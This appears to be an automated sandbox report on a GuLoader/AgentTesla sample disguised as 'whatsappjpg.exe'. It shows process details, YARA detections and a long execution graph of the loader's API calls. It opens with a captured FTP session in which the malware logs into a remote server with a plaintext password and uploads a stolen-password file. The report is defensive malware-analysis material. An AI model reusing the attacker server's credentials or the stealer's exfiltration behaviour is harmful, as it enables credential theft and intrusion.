                                                    Oct 31, 2024 10:36:25.100382090 CET4997621192.168.2.9203.161.184.34PASS LILKOOLL14!
                                                    Oct 31, 2024 10:36:25.477763891 CET2149976203.161.184.34192.168.2.9230 OK. Current restricted directory is /
                                                    Oct 31, 2024 10:36:25.813565016 CET2149976203.161.184.34192.168.2.9504 Unknown command
                                                    Oct 31, 2024 10:36:25.813751936 CET4997621192.168.2.9203.161.184.34PWD
                                                    Oct 31, 2024 10:36:26.149698019 CET2149976203.161.184.34192.168.2.9257 "/" is your current location
                                                    Oct 31, 2024 10:36:26.155028105 CET4997621192.168.2.9203.161.184.34TYPE I
                                                    Oct 31, 2024 10:36:26.490858078 CET2149976203.161.184.34192.168.2.9200 TYPE is now 8-bit binary
                                                    Oct 31, 2024 10:36:26.491040945 CET4997621192.168.2.9203.161.184.34PASV
                                                    Oct 31, 2024 10:36:26.827927113 CET2149976203.161.184.34192.168.2.9227 Entering Passive Mode (203,161,184,34,196,254)
                                                    Oct 31, 2024 10:36:26.833873987 CET4997621192.168.2.9203.161.184.34STOR PW_user-855271_2024_10_31_05_36_23.html
                                                    Oct 31, 2024 10:36:27.736864090 CET2149976203.161.184.34192.168.2.9150 Accepted data connection
                                                    Oct 31, 2024 10:36:28.075668097 CET2149976203.161.184.34192.168.2.9226-File successfully transferred
                                                    226-File successfully transferred226 0.339 seconds (measured here), 0.92 Kbytes per second

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:05:34:00
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\Desktop\whatsappjpg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\whatsappjpg.exe"
                                                    Imagebase:0x400000
                                                    File size:741'566 bytes
                                                    MD5 hash:8A3F9583866E402739F7DA1541D6038D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2581366232.0000000005FA6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:05:36:03
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\Desktop\whatsappjpg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\whatsappjpg.exe"
                                                    Imagebase:0x400000
                                                    File size:741'566 bytes
                                                    MD5 hash:8A3F9583866E402739F7DA1541D6038D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3844735931.00000000364AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3844735931.0000000036483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:19.7%
                                                      Dynamic/Decrypted Code Coverage:15.1%
                                                      Signature Coverage:20.9%
                                                      Total number of Nodes:1507
                                                      Total number of Limit Nodes:38
                                                      execution_graph 4907 10001000 4910 1000101b 4907->4910 4917 1000152e 4910->4917 4912 10001020 4913 10001024 4912->4913 4914 10001027 GlobalAlloc 4912->4914 4915 10001555 2 API calls 4913->4915 4914->4913 4916 10001019 4915->4916 4918 10001243 3 API calls 4917->4918 4919 10001534 4918->4919 4920 1000153a 4919->4920 4921 10001546 GlobalFree 4919->4921 4920->4912 4921->4912 4922 404241 lstrcpynW lstrlenW 4923 401d41 GetDC GetDeviceCaps 4924 402b1b 18 API calls 4923->4924 4925 401d5f MulDiv ReleaseDC 4924->4925 4926 402b1b 18 API calls 4925->4926 4927 401d7e 4926->4927 4928 405f0a 18 API calls 4927->4928 4929 401db7 CreateFontIndirectW 4928->4929 4930 4024e6 4929->4930 4931 401a42 4932 402b1b 18 API calls 4931->4932 4933 401a48 4932->4933 4934 402b1b 18 API calls 4933->4934 4935 4019f0 4934->4935 4936 402744 4937 40273f 4936->4937 4937->4936 4938 402754 FindNextFileW 4937->4938 4939 4027a6 4938->4939 4941 40275f 4938->4941 4942 405ee8 lstrcpynW 4939->4942 4942->4941 4950 401cc6 4951 402b1b 18 API calls 4950->4951 4952 401cd9 SetWindowLongW 4951->4952 4953 4029c5 4952->4953 4094 401dc7 4102 402b1b 4094->4102 4096 401dcd 4097 402b1b 18 API calls 4096->4097 4098 401dd6 4097->4098 4099 401de8 EnableWindow 4098->4099 4100 401ddd ShowWindow 4098->4100 4101 4029c5 4099->4101 4100->4101 4103 405f0a 18 API calls 4102->4103 4104 402b2f 4103->4104 4104->4096 4954 4045c8 4955 4045f4 4954->4955 4956 404605 4954->4956 5015 4056a8 GetDlgItemTextW 4955->5015 4958 404611 GetDlgItem 4956->4958 4963 404670 4956->4963 4960 404625 4958->4960 4959 4045ff 4962 40617c 5 API calls 4959->4962 4966 404639 SetWindowTextW 4960->4966 4971 4059de 4 API calls 4960->4971 4961 404754 4964 4048f5 4961->4964 5017 4056a8 GetDlgItemTextW 4961->5017 4962->4956 4963->4961 4963->4964 4967 405f0a 18 API calls 4963->4967 4970 404194 8 API calls 4964->4970 4969 40412d 19 API calls 4966->4969 4973 4046e4 SHBrowseForFolderW 4967->4973 4968 404784 4974 405a3b 18 API calls 4968->4974 4975 404655 4969->4975 4976 404909 4970->4976 4972 40462f 4971->4972 4972->4966 4980 405933 3 API calls 4972->4980 4973->4961 4977 4046fc CoTaskMemFree 4973->4977 4978 40478a 4974->4978 4979 40412d 19 API calls 4975->4979 4981 405933 3 API calls 4977->4981 5018 405ee8 lstrcpynW 4978->5018 4982 404663 4979->4982 4980->4966 4983 404709 4981->4983 5016 404162 SendMessageW 4982->5016 4986 404740 SetDlgItemTextW 4983->4986 4991 405f0a 18 API calls 4983->4991 4986->4961 4987 404669 4989 406252 3 API calls 4987->4989 4988 4047a1 4990 406252 3 API calls 4988->4990 4989->4963 4997 4047a9 4990->4997 4992 404728 lstrcmpiW 4991->4992 4992->4986 4995 404739 lstrcatW 4992->4995 4993 4047e8 5019 405ee8 lstrcpynW 4993->5019 4995->4986 4996 4047ef 4998 4059de 4 API calls 4996->4998 4997->4993 5001 40597f 2 API calls 4997->5001 5003 40483a 4997->5003 4999 4047f5 GetDiskFreeSpaceW 4998->4999 5002 404818 MulDiv 4999->5002 4999->5003 5001->4997 5002->5003 5004 4048a4 5003->5004 5020 404976 5003->5020 5006 4048c7 5004->5006 5007 40140b 2 API calls 5004->5007 5028 40414f KiUserCallbackDispatcher 5006->5028 5007->5006 5008 404896 5010 4048a6 SetDlgItemTextW 5008->5010 5011 40489b 5008->5011 5010->5004 5013 404976 21 API calls 5011->5013 5012 4048e3 5012->4964 5029 40455d 5012->5029 5013->5004 5015->4959 5016->4987 5017->4968 5018->4988 5019->4996 5021 404993 5020->5021 5022 405f0a 18 API calls 5021->5022 5023 4049c8 5022->5023 5024 405f0a 18 API calls 5023->5024 5025 4049d3 5024->5025 5026 405f0a 18 API calls 5025->5026 5027 404a04 lstrlenW wsprintfW SetDlgItemTextW 5026->5027 5027->5008 5028->5012 5030 404570 SendMessageW 5029->5030 5031 40456b 5029->5031 5030->4964 5031->5030 5032 4042ca 5033 4042e2 5032->5033 5034 4043fc 5032->5034 5038 40412d 19 API calls 5033->5038 5035 404466 5034->5035 5037 404538 5034->5037 5040 404437 GetDlgItem SendMessageW 5034->5040 5036 404470 GetDlgItem 5035->5036 5035->5037 5039 40448a 5036->5039 5043 4044f9 5036->5043 5042 404194 8 API calls 5037->5042 5041 404349 5038->5041 5039->5043 5047 4044b0 6 API calls 5039->5047 5063 40414f KiUserCallbackDispatcher 5040->5063 5045 40412d 19 API calls 5041->5045 5046 404533 5042->5046 5043->5037 5048 40450b 5043->5048 5050 404356 CheckDlgButton 5045->5050 5047->5043 5051 404521 5048->5051 5052 404511 SendMessageW 5048->5052 5049 404461 5053 40455d SendMessageW 5049->5053 5061 40414f KiUserCallbackDispatcher 5050->5061 5051->5046 5055 404527 SendMessageW 5051->5055 5052->5051 5053->5035 5055->5046 5056 404374 GetDlgItem 5062 404162 SendMessageW 5056->5062 5058 40438a SendMessageW 5059 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5058->5059 5060 4043a7 GetSysColor 5058->5060 5059->5046 5060->5059 5061->5056 5062->5058 5063->5049 5064 4024ca 5065 402b38 18 API calls 5064->5065 5066 4024d1 5065->5066 5069 405b54 GetFileAttributesW CreateFileW 5066->5069 5068 4024dd 5069->5068 5070 401bca 5071 402b1b 18 API calls 5070->5071 5072 401bd1 5071->5072 5073 402b1b 18 API calls 5072->5073 5074 401bdb 5073->5074 5075 401beb 5074->5075 5076 402b38 18 API calls 5074->5076 5077 402b38 18 API calls 5075->5077 5081 401bfb 5075->5081 5076->5075 5077->5081 5078 401c06 5082 402b1b 18 API calls 5078->5082 5079 401c4a 5080 402b38 18 API calls 5079->5080 5083 401c4f 5080->5083 5081->5078 5081->5079 5084 401c0b 5082->5084 5085 402b38 18 API calls 5083->5085 5086 402b1b 18 API calls 5084->5086 5087 401c58 FindWindowExW 5085->5087 5088 401c14 5086->5088 5091 401c7a 5087->5091 5089 401c3a SendMessageW 5088->5089 5090 401c1c SendMessageTimeoutW 5088->5090 5089->5091 5090->5091 5092 40194b 5093 402b1b 18 API calls 5092->5093 5094 401952 5093->5094 5095 402b1b 18 API calls 5094->5095 5096 40195c 5095->5096 5097 402b38 18 API calls 5096->5097 5098 401965 5097->5098 5099 401979 lstrlenW 5098->5099 5100 4019b5 5098->5100 5101 401983 5099->5101 5101->5100 5105 405ee8 lstrcpynW 5101->5105 5103 40199e 5103->5100 5104 4019ab lstrlenW 5103->5104 5104->5100 5105->5103 5109 4019cf 5110 402b38 18 API calls 5109->5110 5111 4019d6 5110->5111 5112 402b38 18 API calls 5111->5112 5113 4019df 5112->5113 5114 4019e6 lstrcmpiW 5113->5114 5115 4019f8 lstrcmpW 5113->5115 5116 4019ec 5114->5116 5115->5116 4183 401e51 4184 402b38 18 API calls 4183->4184 4185 401e57 4184->4185 4186 405192 25 API calls 4185->4186 4187 401e61 4186->4187 4201 405663 CreateProcessW 4187->4201 4190 401ec6 CloseHandle 4193 402791 4190->4193 4191 401e77 WaitForSingleObject 4192 401e89 4191->4192 4194 401e9b GetExitCodeProcess 4192->4194 4195 40628b 2 API calls 4192->4195 4196 401eba 4194->4196 4197 401ead 4194->4197 4198 401e90 WaitForSingleObject 4195->4198 4196->4190 4200 401eb8 4196->4200 4204 405e2f wsprintfW 4197->4204 4198->4192 4200->4190 4202 405692 CloseHandle 4201->4202 4203 401e67 4201->4203 4202->4203 4203->4190 4203->4191 4203->4193 4204->4200 4205 402251 4206 40225f 4205->4206 4207 402259 4205->4207 4208 40226d 4206->4208 4210 402b38 18 API calls 4206->4210 4209 402b38 18 API calls 4207->4209 4211 402b38 18 API calls 4208->4211 4213 40227b 4208->4213 4209->4206 4210->4208 4211->4213 4212 402b38 18 API calls 4214 402284 WritePrivateProfileStringW 4212->4214 4213->4212 4215 4052d1 4216 4052f2 GetDlgItem GetDlgItem GetDlgItem 4215->4216 4217 40547d 4215->4217 4261 404162 SendMessageW 4216->4261 4219 405486 GetDlgItem CreateThread CloseHandle 4217->4219 4220 4054ae 4217->4220 4219->4220 4284 405265 OleInitialize 4219->4284 4221 4054d9 4220->4221 4223 4054c5 ShowWindow ShowWindow 4220->4223 4224 4054fe 4220->4224 4225 4054e5 4221->4225 4226 405539 4221->4226 4222 405363 4231 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4222->4231 4266 404162 SendMessageW 4223->4266 4270 404194 4224->4270 4228 405513 ShowWindow 4225->4228 4229 4054ed 4225->4229 4226->4224 4234 405547 SendMessageW 4226->4234 4237 405533 4228->4237 4238 405525 4228->4238 4267 404106 4229->4267 4232 4053d9 4231->4232 4233 4053bd SendMessageW SendMessageW 4231->4233 4239 4053ec 4232->4239 4240 4053de SendMessageW 4232->4240 4233->4232 4236 40550c 4234->4236 4241 405560 CreatePopupMenu 4234->4241 4243 404106 SendMessageW 4237->4243 4242 405192 25 API calls 4238->4242 4262 40412d 4239->4262 4240->4239 4244 405f0a 18 API calls 4241->4244 4242->4237 4243->4226 4246 405570 AppendMenuW 4244->4246 4248 4055a0 TrackPopupMenu 4246->4248 4249 40558d GetWindowRect 4246->4249 4247 4053fc 4250 405405 ShowWindow 4247->4250 4251 405439 GetDlgItem SendMessageW 4247->4251 4248->4236 4252 4055bb 4248->4252 4249->4248 4253 40541b ShowWindow 4250->4253 4256 405428 4250->4256 4251->4236 4254 405460 SendMessageW SendMessageW 4251->4254 4255 4055d7 SendMessageW 4252->4255 4253->4256 4254->4236 4255->4255 4257 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4255->4257 4265 404162 SendMessageW 4256->4265 4259 405619 SendMessageW 4257->4259 4259->4259 4260 405642 GlobalUnlock SetClipboardData CloseClipboard 4259->4260 4260->4236 4261->4222 4263 405f0a 18 API calls 4262->4263 4264 404138 SetDlgItemTextW 4263->4264 4264->4247 4265->4251 4266->4221 4268 404113 SendMessageW 4267->4268 4269 40410d 4267->4269 4268->4224 4269->4268 4271 404235 4270->4271 4272 4041ac GetWindowLongW 4270->4272 4271->4236 4272->4271 4273 4041bd 4272->4273 4274 4041cc GetSysColor 4273->4274 4275 4041cf 4273->4275 4274->4275 4276 4041d5 SetTextColor 4275->4276 4277 4041df SetBkMode 4275->4277 4276->4277 4278 4041f7 GetSysColor 4277->4278 4279 4041fd 4277->4279 4278->4279 4280 404204 SetBkColor 4279->4280 4281 40420e 4279->4281 4280->4281 4281->4271 4282 404221 DeleteObject 4281->4282 4283 404228 CreateBrushIndirect 4281->4283 4282->4283 4283->4271 4291 404179 4284->4291 4286 405288 4290 4052af 4286->4290 4294 401389 4286->4294 4287 404179 SendMessageW 4288 4052c1 OleUninitialize 4287->4288 4290->4287 4292 404191 4291->4292 4293 404182 SendMessageW 4291->4293 4292->4286 4293->4292 4296 401390 4294->4296 4295 4013fe 4295->4286 4296->4295 4297 4013cb MulDiv SendMessageW 4296->4297 4297->4296 4298 401752 4299 402b38 18 API calls 4298->4299 4300 401759 4299->4300 4301 401781 4300->4301 4302 401779 4300->4302 4338 405ee8 lstrcpynW 4301->4338 4337 405ee8 lstrcpynW 4302->4337 4305 40177f 4309 40617c 5 API calls 4305->4309 4306 40178c 4307 405933 3 API calls 4306->4307 4308 401792 lstrcatW 4307->4308 4308->4305 4325 40179e 4309->4325 4310 40622b 2 API calls 4310->4325 4311 405b2f 2 API calls 4311->4325 4313 4017b0 CompareFileTime 4313->4325 4314 401870 4316 405192 25 API calls 4314->4316 4315 401847 4318 405192 25 API calls 4315->4318 4326 40185c 4315->4326 4317 40187a 4316->4317 4320 403060 46 API calls 4317->4320 4318->4326 4319 405ee8 lstrcpynW 4319->4325 4321 40188d 4320->4321 4322 4018a1 SetFileTime 4321->4322 4324 4018b3 CloseHandle 4321->4324 4322->4324 4323 405f0a 18 API calls 4323->4325 4324->4326 4327 4018c4 4324->4327 4325->4310 4325->4311 4325->4313 4325->4314 4325->4315 4325->4319 4325->4323 4336 405b54 GetFileAttributesW CreateFileW 4325->4336 4339 4056c4 4325->4339 4328 4018c9 4327->4328 4329 4018dc 4327->4329 4330 405f0a 18 API calls 4328->4330 4331 405f0a 18 API calls 4329->4331 4333 4018d1 lstrcatW 4330->4333 4334 4018e4 4331->4334 4333->4334 4335 4056c4 MessageBoxIndirectW 4334->4335 4335->4326 4336->4325 4337->4305 4338->4306 4340 4056d9 4339->4340 4341 405725 4340->4341 4342 4056ed MessageBoxIndirectW 4340->4342 4341->4325 4342->4341 5117 402452 5118 402c42 19 API calls 5117->5118 5119 40245c 5118->5119 5120 402b1b 18 API calls 5119->5120 5121 402465 5120->5121 5122 402791 5121->5122 5123 402489 RegEnumValueW 5121->5123 5124 40247d RegEnumKeyW 5121->5124 5123->5122 5125 4024a2 RegCloseKey 5123->5125 5124->5125 5125->5122 5127 4022d3 5128 402303 5127->5128 5129 4022d8 5127->5129 5130 402b38 18 API calls 5128->5130 5131 402c42 19 API calls 5129->5131 5133 40230a 5130->5133 5132 4022df 5131->5132 5134 402b38 18 API calls 5132->5134 5137 402320 5132->5137 5138 402b78 RegOpenKeyExW 5133->5138 5135 4022f0 RegDeleteValueW RegCloseKey 5134->5135 5135->5137 5145 402ba3 5138->5145 5147 402bef 5138->5147 5139 402bc9 RegEnumKeyW 5140 402bdb RegCloseKey 5139->5140 5139->5145 5142 406252 3 API calls 5140->5142 5141 402c00 RegCloseKey 5141->5147 5144 402beb 5142->5144 5143 402b78 3 API calls 5143->5145 5146 402c1b RegDeleteKeyW 5144->5146 5144->5147 5145->5139 5145->5140 5145->5141 5145->5143 5146->5147 5147->5137 5148 401ed4 5149 402b38 18 API calls 5148->5149 5150 401edb 5149->5150 5151 40622b 2 API calls 5150->5151 5152 401ee1 5151->5152 5154 401ef2 5152->5154 5155 405e2f wsprintfW 5152->5155 5155->5154 4365 403c55 4366 403da8 4365->4366 4367 403c6d 4365->4367 4369 403df9 4366->4369 4370 403db9 GetDlgItem GetDlgItem 4366->4370 4367->4366 4368 403c79 4367->4368 4371 403c84 SetWindowPos 4368->4371 4372 403c97 4368->4372 4374 403e53 4369->4374 4379 401389 2 API calls 4369->4379 4373 40412d 19 API calls 4370->4373 4371->4372 4376 403cb4 4372->4376 4377 403c9c ShowWindow 4372->4377 4378 403de3 SetClassLongW 4373->4378 4375 404179 SendMessageW 4374->4375 4395 403da3 4374->4395 4405 403e65 4375->4405 4380 403cd6 4376->4380 4381 403cbc DestroyWindow 4376->4381 4377->4376 4382 40140b 2 API calls 4378->4382 4383 403e2b 4379->4383 4384 403cdb SetWindowLongW 4380->4384 4385 403cec 4380->4385 4434 4040b6 4381->4434 4382->4369 4383->4374 4386 403e2f SendMessageW 4383->4386 4384->4395 4389 403d95 4385->4389 4390 403cf8 GetDlgItem 4385->4390 4386->4395 4387 40140b 2 API calls 4387->4405 4388 4040b8 DestroyWindow EndDialog 4388->4434 4393 404194 8 API calls 4389->4393 4391 403d28 4390->4391 4392 403d0b SendMessageW IsWindowEnabled 4390->4392 4397 403d35 4391->4397 4398 403d7c SendMessageW 4391->4398 4399 403d48 4391->4399 4410 403d2d 4391->4410 4392->4391 4392->4395 4393->4395 4394 4040e7 ShowWindow 4394->4395 4396 405f0a 18 API calls 4396->4405 4397->4398 4397->4410 4398->4389 4402 403d50 4399->4402 4403 403d65 4399->4403 4400 404106 SendMessageW 4404 403d63 4400->4404 4401 40412d 19 API calls 4401->4405 4438 40140b 4402->4438 4406 40140b 2 API calls 4403->4406 4404->4389 4405->4387 4405->4388 4405->4395 4405->4396 4405->4401 4409 40412d 19 API calls 4405->4409 4425 403ff8 DestroyWindow 4405->4425 4408 403d6c 4406->4408 4408->4389 4408->4410 4411 403ee0 GetDlgItem 4409->4411 4410->4400 4412 403ef5 4411->4412 4413 403efd ShowWindow KiUserCallbackDispatcher 4411->4413 4412->4413 4435 40414f KiUserCallbackDispatcher 4413->4435 4415 403f27 EnableWindow 4418 403f3b 4415->4418 4416 403f40 GetSystemMenu EnableMenuItem SendMessageW 4417 403f70 SendMessageW 4416->4417 4416->4418 4417->4418 4418->4416 4436 404162 SendMessageW 4418->4436 4437 405ee8 lstrcpynW 4418->4437 4421 403f9e lstrlenW 4422 405f0a 18 API calls 4421->4422 4423 403fb4 SetWindowTextW 4422->4423 4424 401389 2 API calls 4423->4424 4424->4405 4426 404012 CreateDialogParamW 4425->4426 4425->4434 4427 404045 4426->4427 4426->4434 4428 40412d 19 API calls 4427->4428 4429 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4428->4429 4430 401389 2 API calls 4429->4430 4431 404096 4430->4431 4431->4395 4432 40409e ShowWindow 4431->4432 4433 404179 SendMessageW 4432->4433 4433->4434 4434->4394 4434->4395 4435->4415 4436->4418 4437->4421 4439 401389 2 API calls 4438->4439 4440 401420 4439->4440 4440->4410 4441 10002796 4442 100027e6 4441->4442 4443 100027a6 VirtualProtect 4441->4443 4443->4442 4444 4014d7 4445 402b1b 18 API calls 4444->4445 4446 4014dd Sleep 4445->4446 4448 4029c5 4446->4448 4449 403358 #17 SetErrorMode OleInitialize 4450 406252 3 API calls 4449->4450 4451 40339b SHGetFileInfoW 4450->4451 4522 405ee8 lstrcpynW 4451->4522 4453 4033c6 GetCommandLineW 4523 405ee8 lstrcpynW 4453->4523 4455 4033d8 GetModuleHandleW 4456 4033f0 4455->4456 4457 405960 CharNextW 4456->4457 4458 4033ff CharNextW 4457->4458 4468 40340f 4458->4468 4459 4034e4 4460 4034f8 GetTempPathW 4459->4460 4524 403324 4460->4524 4462 403510 4463 403514 GetWindowsDirectoryW lstrcatW 4462->4463 4464 40356a DeleteFileW 4462->4464 4466 403324 11 API calls 4463->4466 4532 402dba GetTickCount GetModuleFileNameW 4464->4532 4465 405960 CharNextW 4465->4468 4469 403530 4466->4469 4468->4459 4468->4465 4472 4034e6 4468->4472 4469->4464 4471 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4469->4471 4470 40357e 4473 403616 4470->4473 4477 403606 4470->4477 4480 405960 CharNextW 4470->4480 4476 403324 11 API calls 4471->4476 4616 405ee8 lstrcpynW 4472->4616 4619 4037c0 4473->4619 4479 403562 4476->4479 4562 4038b2 4477->4562 4479->4464 4479->4473 4482 403599 4480->4482 4489 4035e0 4482->4489 4490 403645 lstrcatW lstrcmpiW 4482->4490 4483 403725 4486 4037a8 ExitProcess 4483->4486 4487 406252 3 API calls 4483->4487 4484 40362f 4485 4056c4 MessageBoxIndirectW 4484->4485 4491 40363d ExitProcess 4485->4491 4492 403734 4487->4492 4493 405a3b 18 API calls 4489->4493 4490->4473 4494 403661 CreateDirectoryW SetCurrentDirectoryW 4490->4494 4495 406252 3 API calls 4492->4495 4496 4035ec 4493->4496 4497 403684 4494->4497 4498 403679 4494->4498 4499 40373d 4495->4499 4496->4473 4617 405ee8 lstrcpynW 4496->4617 4629 405ee8 lstrcpynW 4497->4629 4628 405ee8 lstrcpynW 4498->4628 4502 406252 3 API calls 4499->4502 4504 403746 4502->4504 4506 403794 ExitWindowsEx 4504->4506 4513 403754 GetCurrentProcess 4504->4513 4505 4035fb 4618 405ee8 lstrcpynW 4505->4618 4506->4486 4509 4037a1 4506->4509 4508 405f0a 18 API calls 4510 4036c3 DeleteFileW 4508->4510 4511 40140b 2 API calls 4509->4511 4512 4036d0 CopyFileW 4510->4512 4519 403692 4510->4519 4511->4486 4512->4519 4516 403764 4513->4516 4514 403719 4517 405d82 40 API calls 4514->4517 4515 405d82 40 API calls 4515->4519 4516->4506 4517->4473 4518 405f0a 18 API calls 4518->4519 4519->4508 4519->4514 4519->4515 4519->4518 4520 405663 2 API calls 4519->4520 4521 403704 CloseHandle 4519->4521 4520->4519 4521->4519 4522->4453 4523->4455 4525 40617c 5 API calls 4524->4525 4527 403330 4525->4527 4526 40333a 4526->4462 4527->4526 4528 405933 3 API calls 4527->4528 4529 403342 CreateDirectoryW 4528->4529 4630 405b83 4529->4630 4634 405b54 GetFileAttributesW CreateFileW 4532->4634 4534 402dfd 4561 402e0a 4534->4561 4635 405ee8 lstrcpynW 4534->4635 4536 402e20 4537 40597f 2 API calls 4536->4537 4538 402e26 4537->4538 4636 405ee8 lstrcpynW 4538->4636 4540 402e31 GetFileSize 4541 402f32 4540->4541 4560 402e48 4540->4560 4542 402d18 33 API calls 4541->4542 4544 402f39 4542->4544 4543 4032f7 ReadFile 4543->4560 4545 402f75 GlobalAlloc 4544->4545 4544->4561 4638 40330d SetFilePointer 4544->4638 4548 402f8c 4545->4548 4546 402fcd 4549 402d18 33 API calls 4546->4549 4553 405b83 2 API calls 4548->4553 4549->4561 4550 402f56 4551 4032f7 ReadFile 4550->4551 4554 402f61 4551->4554 4552 402d18 33 API calls 4552->4560 4555 402f9d CreateFileW 4553->4555 4554->4545 4554->4561 4556 402fd7 4555->4556 4555->4561 4637 40330d SetFilePointer 4556->4637 4558 402fe5 4559 403060 46 API calls 4558->4559 4559->4561 4560->4541 4560->4543 4560->4546 4560->4552 4560->4561 4561->4470 4563 406252 3 API calls 4562->4563 4564 4038c6 4563->4564 4565 4038cc 4564->4565 4566 4038de 4564->4566 4648 405e2f wsprintfW 4565->4648 4567 405db5 3 API calls 4566->4567 4568 40390e 4567->4568 4570 40392d lstrcatW 4568->4570 4572 405db5 3 API calls 4568->4572 4571 4038dc 4570->4571 4639 403b88 4571->4639 4572->4570 4575 405a3b 18 API calls 4576 40395f 4575->4576 4577 4039f3 4576->4577 4579 405db5 3 API calls 4576->4579 4578 405a3b 18 API calls 4577->4578 4580 4039f9 4578->4580 4581 403991 4579->4581 4582 403a09 LoadImageW 4580->4582 4583 405f0a 18 API calls 4580->4583 4581->4577 4587 4039b2 lstrlenW 4581->4587 4591 405960 CharNextW 4581->4591 4584 403a30 RegisterClassW 4582->4584 4585 403aaf 4582->4585 4583->4582 4588 403a66 SystemParametersInfoW CreateWindowExW 4584->4588 4589 403ab9 4584->4589 4586 40140b 2 API calls 4585->4586 4590 403ab5 4586->4590 4592 4039c0 lstrcmpiW 4587->4592 4593 4039e6 4587->4593 4588->4585 4589->4473 4590->4589 4598 403b88 19 API calls 4590->4598 4596 4039af 4591->4596 4592->4593 4594 4039d0 GetFileAttributesW 4592->4594 4595 405933 3 API calls 4593->4595 4597 4039dc 4594->4597 4599 4039ec 4595->4599 4596->4587 4597->4593 4600 40597f 2 API calls 4597->4600 4601 403ac6 4598->4601 4649 405ee8 lstrcpynW 4599->4649 4600->4593 4603 403ad2 ShowWindow LoadLibraryW 4601->4603 4604 403b55 4601->4604 4606 403af1 LoadLibraryW 4603->4606 4607 403af8 GetClassInfoW 4603->4607 4605 405265 5 API calls 4604->4605 4608 403b5b 4605->4608 4606->4607 4609 403b22 DialogBoxParamW 4607->4609 4610 403b0c GetClassInfoW RegisterClassW 4607->4610 4611 403b77 4608->4611 4612 403b5f 4608->4612 4613 40140b 2 API calls 4609->4613 4610->4609 4614 40140b 2 API calls 4611->4614 4612->4589 4615 40140b 2 API calls 4612->4615 4613->4589 4614->4589 4615->4589 4616->4460 4617->4505 4618->4477 4620 4037d1 CloseHandle 4619->4620 4621 4037db 4619->4621 4620->4621 4622 4037e5 CloseHandle 4621->4622 4623 4037ef 4621->4623 4622->4623 4651 40381d 4623->4651 4626 405770 71 API calls 4627 40361f OleUninitialize 4626->4627 4627->4483 4627->4484 4628->4497 4629->4519 4631 405b90 GetTickCount GetTempFileNameW 4630->4631 4632 403356 4631->4632 4633 405bc6 4631->4633 4632->4462 4633->4631 4633->4632 4634->4534 4635->4536 4636->4540 4637->4558 4638->4550 4640 403b9c 4639->4640 4650 405e2f wsprintfW 4640->4650 4642 403c0d 4643 405f0a 18 API calls 4642->4643 4644 403c19 SetWindowTextW 4643->4644 4645 40393d 4644->4645 4646 403c35 4644->4646 4645->4575 4646->4645 4647 405f0a 18 API calls 4646->4647 4647->4646 4648->4571 4649->4577 4650->4642 4653 40382b 4651->4653 4652 4037f4 4652->4626 4653->4652 4654 403830 FreeLibrary GlobalFree 4653->4654 4654->4652 4654->4654 5156 40155b 5157 40296b 5156->5157 5160 405e2f wsprintfW 5157->5160 5159 402970 5160->5159 4870 4023de 4881 402c42 4870->4881 4872 4023e8 4873 402b38 18 API calls 4872->4873 4874 4023f1 4873->4874 4875 4023fc RegQueryValueExW 4874->4875 4878 402791 4874->4878 4876 40241c 4875->4876 4877 402422 RegCloseKey 4875->4877 4876->4877 4885 405e2f wsprintfW 4876->4885 4877->4878 4882 402b38 18 API calls 4881->4882 4883 402c5b 4882->4883 4884 402c69 RegOpenKeyExW 4883->4884 4884->4872 4885->4877 5168 401ce5 GetDlgItem GetClientRect 5169 402b38 18 API calls 5168->5169 5170 401d17 LoadImageW SendMessageW 5169->5170 5171 4029c5 5170->5171 5172 401d35 DeleteObject 5170->5172 5172->5171 5173 40206a 5174 402b38 18 API calls 5173->5174 5175 402071 5174->5175 5176 402b38 18 API calls 5175->5176 5177 40207b 5176->5177 5178 402b38 18 API calls 5177->5178 5179 402084 5178->5179 5180 402b38 18 API calls 5179->5180 5181 40208e 5180->5181 5182 402b38 18 API calls 5181->5182 5183 402098 5182->5183 5184 4020ac CoCreateInstance 5183->5184 5185 402b38 18 API calls 5183->5185 5188 4020cb 5184->5188 5185->5184 5186 401423 25 API calls 5187 402195 5186->5187 5188->5186 5188->5187 5189 40156b 5190 401584 5189->5190 5191 40157b ShowWindow 5189->5191 5192 401592 ShowWindow 5190->5192 5193 4029c5 5190->5193 5191->5190 5192->5193 5194 4024ec 5195 4024f1 5194->5195 5196 40250a 5194->5196 5197 402b1b 18 API calls 5195->5197 5198 402510 5196->5198 5199 40253c 5196->5199 5204 4024f8 5197->5204 5200 402b38 18 API calls 5198->5200 5201 402b38 18 API calls 5199->5201 5202 402517 WideCharToMultiByte lstrlenA 5200->5202 5203 402543 lstrlenW 5201->5203 5202->5204 5203->5204 5205 402565 WriteFile 5204->5205 5206 402791 5204->5206 5205->5206 5207 40276e 5208 402b38 18 API calls 5207->5208 5209 402775 FindFirstFileW 5208->5209 